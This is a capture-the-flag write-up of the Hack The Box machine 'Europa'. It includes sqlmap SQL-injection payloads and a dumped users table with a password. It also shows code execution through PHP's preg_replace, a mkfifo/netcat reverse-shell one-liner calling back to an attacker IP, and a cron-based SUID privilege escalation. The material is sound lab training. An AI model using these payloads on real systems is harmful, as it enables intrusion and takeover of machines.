Recon
Let’s explore Europa. Looks a bit like Apache default page if you ask me.
$nmap -p- -A 10.129.166.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 16:10 UTC
Nmap scan report for 10.129.166.9
Host is up (0.034s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_ 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after: 2027-04-17T09:06:22
|_http-title: Apache2 Ubuntu Default Page: It works
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelSo I’ve added europacorp.htb to the dnsmasq and tried out then the newly found https://admin-portal.europacorp.htb, I got a log in page.
I run sqlmap against it and got a 302 redirect to 'https://admin-portal.europacorp.htb/dashboard.php. Going to it, we just seem to be logged in and are able to use the whole site. We also get dump of users database.
custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 408 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: email=test@test.com' RLIKE (SELECT (CASE WHEN (6890=6890) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- tdBn&password=123
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=test@test.com' AND GTID_SUBSET(CONCAT(0x7176626271,(SELECT (ELT(1905=1905,1))),0x71626a7871),1905)-- QaPi&password=123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=test@test.com' AND (SELECT 9800 FROM (SELECT(SLEEP(5)))zGtH)-- kcZw&password=123
---Database: admin
Table: users
[2 entries]
+----+----------------------+----------+----------------------------------+---------------+
| id | email | active | password | username |
+----+----------------------+----------+----------------------------------+---------------+
| 1 | admin@europacorp.htb | 1 | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2 | john@europacorp.htb | 1 | 2b6d315337f18617ba18922c0b9597ff | john |
+----+----------------------+----------+----------------------------------+---------------+admin pass is SuperSecretPassword!
Dashboard
The only availeable tool to us is OpenVPN Config generator.
"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "ip_address",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"ip_address/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}When providing any input and looking at our request in burpsuite, we can see that there is a “pattern” variable, probably for some regex, that tries to add our ipaddress to the text.
Searching for “php replace in text with regex” gets us stackoverflow telling about preg_replace. Looking for some ways to exploit it, I’ve found RCE on hacktricks.xyz
I was confused for a while here and tried to terminate somehow php and put everything in the pattern field, i.e pattern=/ip_address/e", "print('hello');", $text);. That did not work whatsoever, but after a while I found the right way, separating it into params just like on hacktricks.
Running system('ls /home/') gets us user John. We can’t get in via ssh, so we need to create a reverse shell. We can copy from InternalAllTheThings and get system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.17 4242 >/tmp/f'). On host run nc -lvnp 4242, send request and we are in.
Let’s get standard shell stabilisation and work towards priv esc for root. Flag can be obtained from /home/john/user.txt.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fgPriv Esc
Running linenum we can find that there is cronjob running every minute at /var/www/cronjobs/clearlogs. We can’t modify it, but we can see its contents.
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>Looking for the logcleared.sh, I realized that it does not exist.
www-data@europa:/tmp$ ls -la /var/www/cmd/
total 8
drwxrwxr-x 2 root www-data 4096 May 17 2022 .
drwxr-xr-x 6 root root 4096 May 17 2022 ..Let’s make one then with echo "chmod u+s /bin/bash" > logcleared.sh, set chmod 777 logcleared.sh and wait a minute. Then, run /bin/bash -p to get root and we are done here.
